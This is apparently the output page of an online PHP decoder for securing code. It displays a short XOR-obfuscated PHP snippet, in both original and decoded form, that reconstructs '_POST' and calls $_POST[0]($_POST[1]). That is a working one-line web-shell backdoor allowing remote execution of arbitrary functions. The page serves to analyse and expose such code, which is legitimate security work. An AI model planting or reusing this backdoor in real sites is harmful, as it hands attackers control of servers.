Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php @$_++; // $_ = 1 $__=("#"^"|"); // $__ = _ $__.=("."^"~"); // _P ..

Decoded Output download

<?php 
    @$_++; // $_ = 1 
    $__=("#"^"|"); // $__ = _ 
    $__.=("."^"~"); // _P 
    $__.=("/"^"`"); // _PO 
    $__.=("|"^"/"); // _POS 
    $__.=("{"^"/"); // _POST  
    ${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]); 
?> 

Did this file decode correctly?

Original Code

<?php
    @$_++; // $_ = 1
    $__=("#"^"|"); // $__ = _
    $__.=("."^"~"); // _P
    $__.=("/"^"`"); // _PO
    $__.=("|"^"/"); // _POS
    $__.=("{"^"/"); // _POST 
    ${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]);
?>

Function Calls

None

Variables

None

Stats

MD5 2812d0e326e38c3d6a4072212ccf05d0
Eval Count 0
Decode Time 110 ms